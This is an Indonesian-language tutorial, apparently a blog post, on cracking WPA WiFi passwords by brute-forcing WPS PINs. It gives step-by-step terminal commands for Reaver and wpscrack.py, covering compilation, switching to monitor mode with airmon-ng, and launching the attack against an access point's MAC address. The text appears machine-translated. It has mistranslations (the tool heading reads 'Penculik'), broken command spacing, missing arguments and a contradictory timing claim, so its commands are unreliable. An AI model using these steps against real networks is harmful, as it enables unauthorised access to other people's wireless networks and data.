Cara Hack Sandi WPA WiFi Dan Cracking PIN WPS

Sebuah cacat dalam WPS atau WIFI Protected Setup, diketahui selama lebih dari setahun oleh TNS, akhirnya dieksploitasi dengan bukti kode konsep kedua TNS, para penemu mengeksploitasi di . braindump dan Stefan telah menciptakan program "reaver" dan "wpscrack" untuk dieksploitasi kerentanan WPS ini, password WPA dapat dipulihkan hampir seketika di sekitar teks setelah serangan pada titik akses WPS dimulai, yang biasanya memakan waktu 2-10 jam (tergantung pada program yang Anda gunakan). 

Mengeksploitasi kekalahan WPS melalui brute force attack cerdas untuk PIN WPS statis. Dengan menebak PIN, router akan benar-benar melemparkan kembali, apakah empat digit pertama (delapan) sudah benar. Kemudian, jumlah akhir adalah nomor pengecekan digunakan untuk memenuhi algoritma. Ini dapat dimanfaatkan untuk brute force PIN WPS, dan memungkinkan pemulihan password WPA dalam jumlah yang sangat singkat yang bertentangan dengan serangan standar pada WPA. 

Bagaimana cara menggunakan kedua alat untuk memecahkan WPS. Tidak ada router yang aman dari serangan ini, namun tak satu pun dari vendor bereaksi dan dirilis firmware dengan mitigations. Bahkan menonaktifkan WPS masih memungkinkan serangan ini pada kebanyakan router.

Persyaratan yang harus dipenuhi:

• OS Linux

• Sebuah router WPS di rumah

• Instal Program-program (menginstal dengan nama paket): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev

Peralatan:

• Reaver (dukungan untuk semua router)

• wpscrack (lebih cepat, hanya dukungan untuk merek router utama)

Crack WPS

Teks dalam huruf hitam tebal adalah perintah terminal.

Ikuti panduan yang sesuai dengan alat yang Anda gunakan untuk itu perhatikan dibawah.

Penculik

1. Unzip Reaver . unzip reaver-1.3.tar.gz

2. Mengubah ke direktori Reaver . cd reaver-1.3

3. Mengkonfigurasi, mengkompilasi dan menginstal aplikasi. . /configure && make && sudo make install

4. Memindai jalur akses untuk menyerang, dan menyalin alamat MAC untuk kemudian (XX: XX: XX: XX: XX: XX) . sudo iwlist wlan0 pemindaian

5. Mengatur perangkat Anda ke modus monitor . sudo airmon-ng start wlan0

6. Jalankan alat terhadap jalur akses . reaver -i mon0 -b -vv

7. Tunggu sampai selesai.

Alat ini membuat terlalu mudah . wpscrack.py

1. Membuat program yang dapat dieksekusi . chmod + x wpscrack.py

2. Memindai jalur akses untuk menyerang, dan menyalin alamat MAC untuk kemudian (XX: XX: XX: XX: XX: XX) . sudo iwlist wlan0 pemindaian

3. Mendapatkan alamat MAC Anda, simpan untuk nanti . ip Link acara wlan0 | awk '/ eter / {print $ 2}'

4. Mengatur perangkat Anda ke modus monitor . sudo airmon-ng start wlan0

5. Menyerang AP Anda . wpscrack.py -iface mon0-klien -bssid

--ssid v

6. Selesai. 

Sekarang, mari kita berharap melihat banyak tindakan update firmware terjadi dalam waktu dekat. Selamat mencoba!